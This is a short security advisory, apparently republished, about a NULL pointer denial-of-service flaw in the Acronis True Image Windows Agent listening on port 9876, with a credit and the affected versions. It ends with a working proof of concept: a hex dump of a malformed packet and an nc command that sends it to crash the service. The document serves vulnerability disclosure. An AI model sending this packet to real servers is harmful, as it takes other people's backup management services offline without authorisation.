The Acronis Agent is "an essential component of Acronis True Image Echo Server (Workstation and Enterprise packages) and is a server running on the TCP and UDP port 9876 which allows the local and remote management of Acronis TrueImage". A vulnerability in the way the Acronis True Image Windows Agent handles incoming traffic allows remote attackers to cause the service to crash.
The Acronis True Image Windows Agent must not be confused with the Acronis Snap Deploy Management Agent, which uses the same ports but a different protocol and so is not affected by this bug.
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/acroagent-adv.txt
Vulnerable Systems:
* Acronis True Image Windows Agent version 1.0.0.54
* Acronis True Image Enterprise Server version 9.5.0.8072

A NULL pointer vulnerability can be exploited by sending a malformed packet to the server, causing its immediate termination.

Exploit:
The following hex dump, when sent to the server, will cause it to crash:
0000000 0005 0000 0002 0001 1600 0003 ff00 ffff
0000010 ffff ffff
Command:
nc SERVER 9876 -v -v < acroagent.txt